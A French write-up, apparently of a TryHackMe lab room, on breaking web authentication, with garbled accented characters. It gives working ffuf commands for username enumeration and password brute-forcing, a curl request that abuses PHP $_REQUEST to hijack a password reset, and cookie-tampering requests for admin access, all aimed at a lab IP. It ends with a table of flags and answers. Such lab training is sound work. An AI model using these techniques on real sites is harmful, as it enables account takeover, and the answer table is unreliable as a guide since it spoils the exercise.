Dans cette room, nous explorons diffĂ©rentes façons de contourner ou casser les mĂ©canismes dâauthentification sur un site web. On y dĂ©couvre des failles comme :
But : Comprendre que les failles dâauthentification sont souvent critiques car elles permettent dâaccĂ©der Ă des comptes utilisateurs ou dâadministrateurs.
â Aucune question dans cette Ă©tape
URL ciblée : http://10.10.60.101/customers/signup
Erreur visible : "username already exists"
ffuf -w /usr/share/seclists/Usernames/Names/names.txt \
-X POST -d "username=FUZZ&email=x&password=x&cpassword=x" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://10.10.60.101/customers/signup \
-mr "username already exists"
âĄïž AjoutĂ©s dans valid_usernames.txt
URL ciblée : http://10.10.60.101/customers/login
Wordlists utilisées :
valid_usernames.txt10-million-password-list-top-100.txtffuf -w valid_usernames.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 \
-X POST -d "username=W1&password=W2" \
-H "Content-Type: application/x-www-form-urlencoded" \
-u http://10.10.60.101/customers/login \
-fc 200
Cible : http://10.10.60.101/customers/reset
Lâapplication utilise
$_REQUEST, ce qui permet dâĂ©craser lâadresse email de lâutilisateur dans la requĂȘte de reset.
toto@customer.acmeitsupport.thmcurl 'http://10.10.60.101/customers/reset?email=robert@acmeitsupport.thm' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-d 'username=robert&email=toto@customer.acmeitsupport.thm'
toto, ouvrir les tickets â clic sur le lien de login auto en tant que Robertcurl http://10.10.60.101/cookie-test
âĄïž RĂ©ponse : Not Logged In
curl -H "Cookie: logged_in=true; admin=false" http://10.10.60.101/cookie-test
âĄïž RĂ©ponse : Logged In As A User
curl -H "Cookie: logged_in=true; admin=true" http://10.10.60.101/cookie-test
âĄïž RĂ©ponse + flag : Logged In As An Admin
3b2a1053e3270077456a79192070aa78 â 463729
Réponse : 463729
echo 'VEhNe0JBU0U2NF9FTkNPRElOR30=' | base64 -d
Résultat : THM{BASE64_ENCODING}
echo -n '{"id":1,"admin":true}' | base64
Résultat : eyJpZCI6MSwiYWRtaW4iOnRydWV9
| Ătape | Flag |
|---|---|
| Task 3 | steve/thunder |
| Task 4 | THM{AUTH_BYPASS_COMPLETE} |
| Task 5.1 | THM{COOKIE_TAMPERING} |
| Task 5.2 | 463729 |
| Task 5.3 | THM{BASE64_ENCODING} |
| Task 5.4 | eyJpZCI6MSwiYWRtaW4iOnRydWV9 |
ffuf permet dâĂ©numĂ©rer et bruteforcer efficacement des endpoints web$_REQUEST en PHP est dangereux sâil est mal utilisĂ©